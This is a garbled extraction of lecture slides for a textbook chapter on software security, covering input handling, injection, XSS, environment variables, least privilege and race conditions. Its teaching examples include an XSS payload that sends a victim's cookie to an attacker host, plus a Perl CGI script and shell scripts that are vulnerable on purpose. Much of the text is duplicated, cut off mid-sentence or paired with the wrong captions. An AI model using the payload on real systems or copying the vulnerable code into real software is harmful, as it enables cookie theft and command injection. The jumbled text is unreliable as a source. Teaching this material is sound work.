Computer security principles and practice 3rd by williams stallings and brown ch11

Software Security, Quality and Reliability• Software quality and reliability: o Concerned with the accidental failure of program o Improve using structured design and testing to ident

Chapter 11

Software Security

and validation of data

and error codes

o Awareness of these issues is

a critical initial step in writing

more secure program code

components

Software error categories:

Software error categories:

Table 11.1

CWE/SANS TOP 25 Most Dangerous Software Errors (2011)

Software Security, Quality and Reliability

• Software quality and

reliability:

o Concerned with the

accidental failure of program

o Improve using structured

design and testing to identify

and eliminate as many bugs

as possible from a program

o Concern is not how many

bugs, but how often they are

triggered

• Software security:

o Attacker chooses probability distribution, specifically

targeting bugs that result in

a failure that can be exploited by the attacker

o Triggered by inputs that differ dramatically from what

is usually expected

o Unlikely to be identified by common testing approaches

Defensive Programming

• Designing and implementing software so that it continues to function even when under attack

• Requires attention to all aspects of program

execution, environment, and type of data it

processes

• Software is able to detect erroneous conditions resulting from some attack

• Also referred to as secure programming

• Key rule is to never assume anything, check all assumptions and handle any possible error states

Operating System

executing algorithm, processing input data, generating output

Other Programs

Figure 11.1 Abstract View of Program

Defensive Programming

• Programmers often make

assumptions about the type of

inputs a program will receive

and the environment it

executes in

o Assumptions need to be validated

by the program and all potential

failures handled gracefully and

safely

• Requires a changed mindset

to traditional programming

practices

o Programmers have to understand

how failures can occur and the

steps needed to reduce the chance

of them occurring in their programs

• Conflicts with business

pressures to keep development

times as short as possible to

maximize market advantage

Security by Design

• Security and reliability are common design goals

in most engineering disciplines

• Software development not as mature

• Recent years have seen increasing efforts to

improve secure software development processes

• Software Assurance Forum for Excellence in Code (SAFECode)

o Develop publications outlining industry best practices for software

assurance and providing practical advice for implementing proven

methods for secure software development

Handling Program

Input

Incorrect handling is a very

common failing

Incorrect handling is a very

common failing

Input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written

Input is any source of data from outside and whose value is not explicitly known by the programmer when the code was written

Must identify all

data sources

Must identify all

data sources

Explicitly validate assumptions on size and type of values before use

Explicitly validate assumptions on size and type of values before use

Input Size & Buffer

Overflow

• Programmers often make assumptions about the maximum expected size of input

o Allocated buffer size is not confirmed

o Resulting in buffer overflow

• Testing may not identify vulnerability

o Test inputs are unlikely to include large enough inputs to

trigger the overflow

• Safe coding treats all input as dangerous

Interpretation of Program

Input

• Program input may be binary or text

o Binary interpretation depends on encoding and is usually

application specific

• There is an increasing variety of character sets being used

o Care is needed to identify just which set is being used and

what characters are being read

• Failure to validate may result in an exploitable

vulnerability

• 2014 Heartbleed OpenSSL bug is a recent

example of a failure to check the validity

of a binary input value

to save coding effort

• Often used as Web CGI scripts

1 #!/usr/bin/perl

2 # finger.cgi - finger CGI script using Perl5 CGI module

3

4 use CGI;

5 use CGI::Carp qw(fatalsToBrowser);

6 $q = new CGI; # create query object

<form method=post action="finger.cgi">

<b>Username to finger</b>: <input type=text name=user value="">

<p><input type=submit value="Finger User">

</form></body></html>

(b) Finger form

Fi nger User

Login Name TTY Idle Login Time Where

lpb Lawrie Brown p0 Sat 15:24 ppp41.grapevine

Fi nger User

attack success

-rwxr-xr-x 1 lpb staff 537 Oct 21 16:19 finger.cgi

-rw-r r 1 lpb staff 251 Oct 21 16:14 finger.html

(c) Expected and subverted finger CGI responses

14 # get name of user and display their finger details

15 $user = $q->param("user");

16 die "The specified user contains illegal characters!"

17 unless ($user =~ /^\w+$/);

18 print `/usr/bin/finger -sh $user`;

(d) Safety extension to Perl finger CGI script

Figure 11.2 A Web CGI Injection Attack

<?php

include $path 'functions.php';

include $path 'data/prefs.php';

Cross Site Scripting (XSS)

• Vulnerability involves the inclusion of script code in the HTML content

• Script code may need

to access data associated with other pages

• Browsers impose security checks and restrict data access

to pages originating from the same site

Commonly seen

in scripted Web applications

• Vulnerability involves the inclusion of script code in the HTML content

• Script code may need

to access data associated with other pages

• Browsers impose security checks and restrict data access

to pages originating from the same site

Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site

Exploit assumption that all content from one site is equally trusted and hence is permitted to interact with other content from the site

XSS reflection vulnerability

• Attacker includes the malicious script

content in data supplied to a site

XSS reflection vulnerability

• Attacker includes the malicious script

content in data supplied to a site

Thanks for this information, its great!

<script>document.location='http://hacker.web.site/cookie.cgi?'+ document.cookie</script>

(a) Plain XSS example

Thanks for this information, its great!

Validating Input Syntax

is wanted

Input data should be compared against what

is wanted

Alternative

is to compare the input data with known dangerous values

Alternative

is to compare the input data with known dangerous values

By only accepting known safe data the program is more likely

to remain secure

By only accepting known safe data the program is more likely

to remain secure

to interact with them

using their own languages

Growing requirement

to support users around the globe and

to interact with them

using their own languages

Unicode used for

• Many Unicode decoders

accept any valid equivalent

• Many Unicode decoders

accept any valid equivalent

sequence

Canonicalization

• Transforming input data into

a single, standard, minimal representation

• Once this is done the input data can be compared with

a single representation of acceptable input values

Canonicalization

• Transforming input data into

a single, standard, minimal representation

• Once this is done the input data can be compared with

a single representation of acceptable input values

o Floating point numbers depend on the processor used

o Values may be signed or unsigned

• Must correctly interpret text form and process consistently

o Have issues comparing signed to unsigned

o Could be used to thwart buffer overflow check

Input Fuzzing

• Developed by Professor Barton Miller at the

University of Wisconsin Madison in 1989

• Software testing technique that uses randomly generated data as inputs to a program

o Range of inputs is very large

o Intent is to determine if the program or function correctly handles abnormal inputs

o Simple, free of assumptions, cheap

o Assists with reliability as well as security

• Can also use templates to generate classes of known problem inputs

o Disadvantage is that bugs triggered by other forms of input would be missed

o Combination of approaches is needed for reasonably comprehensive coverage of the inputs

Writing Safe Program

Security issues:

• Correct algorithm implementation

• Correct machine instructions for algorithm

• Valid manipulation of data

Correct Algorithm Implementation

Issue of good program

development

technique

Algorithm may not

correctly handle all

problem variants

Algorithm may not

correctly handle all

Combination of the sequence number

as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack

to occur

Combination of the sequence number

as an identifier and authenticator of packets and the failure to make them sufficiently unpredictable enables the attack

to occur

Another variant is

when the programmers deliberately include additional code in a program to help test

and debug it

Often code remains in production release of a program and could inappropriately release

information

Often code remains in production release of a program and could inappropriately release

information

May permit a user to bypass security checks and perform actions they would not otherwise be allowed to

perform

May permit a user to bypass security checks and perform actions they would not otherwise be allowed to

perform

This vulnerability was exploited by the Morris Internet Worm

This vulnerability was exploited by the Morris Internet Worm

Ensuring Machine Language Corresponds to Algorithm

• Issue is ignored by most programmers

o Assumption is that the compiler or interpreter generates or executes code that validly implements the language

statements

• Requires comparing machine code with original source

o Slow and difficult

• Development of computer systems with very high assurance level is the one area where this level of checking is required

o Specifically Common Criteria assurance level of EAL 7

Correct Data Interpretation

o Accessed and manipulated in

memory or copied into

processor registers before

capabilities for restricting and validating

interpretation

Correct Use of Memory

• Issue of dynamic memory allocation

o Used to manipulate unknown amounts of data

o Allocated when needed, released when done

o Use standard library routines to allocate and release memory

• Modern languages handle automatically

o Processes or threads wait on a resource held by the other

o One or more programs has to be terminated

Operating System

Interaction

• Programs execute on systems under the control

of an operating system

o Mediates and shares access to resources

o Constructs execution environment

o Includes environment variables and arguments

• Systems have a concept of multiple users

o Resources are owned by a user and have permissions granting access with various rights to different categories of users

o Programs need access to various resources, however excessive levels

of access are dangerous

o Concerns when multiple programs access shared resources such

as a common file

Environment Variables

• Collection of string values inherited by each

process from its parent

o Can affect the way a running process behaves

o Included in memory when it is constructed

• Can be modified by the program process at any time

o Modifications will be passed to its children

• Another source of untrusted program input

• Most common use is by a local user attempting to gain increased privileges

o Goal is to subvert a program that grants superuser or

administrator privileges

#!/bin/bash

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(a) Example vulnerable privileged shell script

#!/bin/bash

PATH=”/sbin:/bin:/usr/sbin:/usr/bin”

export PATH

user=`echo $1 | sed 's/@.*$//'`

grep $user /var/local/accounts/ipaddrs

(b) Still vulnerable privileged shell script

Figure 11.6 Vulnerable Shell Scripts

If dynamically linked may be

or prevent use of this variable

Use of Least Privilege

• Decide whether to grant extra user or just group privileges

Determine appropriate user and group privileges required

• Decide whether to grant extra user or just group privileges

Ensure that privileged program can modify only those files and directories necessary

Ensure that privileged program can modify only those files and directories necessary

Root/Administrator

Privileges

Programs with root/

administrator privileges are a major target of attackers

Programs with root/

administrator privileges are a major target of attackers

Often privilege is only needed at start

Often privilege is only needed at start

Good design partitions complex programs in smaller modules with needed

privileges

Good design partitions complex programs in smaller modules with needed

• Can then run as normal user

• Can then run as normal user

• Provides a greater degree of isolation between the

components

• Reduces the consequences of a security breach in one

component

• Easier to test and verify

• Provides a greater degree of isolation between the

System Calls and Standard Library Functions

Programs use system

calls and standard

library functions for

common operations

Programmers make assumptions about their operation

• If incorrect behavior is not what is expected

• May be a result of system optimizing access to shared resources

• Results in requests for services being buffered, resequenced, or otherwise modified to optimize system use

• Optimizations can conflict with program goals

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for writing

for each pattern

seek to start of file

overwrite file contents with pattern

close file

remove file

(a) Initial secure file shredding program algorithm

patterns = [10101010, 01010101, 11001100, 00110011, 00000000, 11111111, … ] open file for update

for each pattern

seek to start of file

overwrite file contents with pattern

flush application write buffers

sync file system write buffers with device

close file

remove file

(b) Better secure file shredding program algorithm

Figure 11.7 Example Global Data Overflow Attack

Preventing Race

Conditions

• Programs may need to access a common system resource

• Need suitable synchronization mechanisms

o Most common technique is to acquire a lock on the shared file

• Lockfile

o Process must create and own the lockfile in order to gain access

to the shared resource

# open data file and acquire exclusive access lock

open (FILE, ">> $FILENAME") || die "Failed to open $FILENAME \n"; flock FILE, $EXCL_LOCK;

… use exclusive access to the forminfo file to save details

# unlock and close file

flock FILE, $UNLOCK;

close(FILE);

Figure 11.8 Perl File Locking Example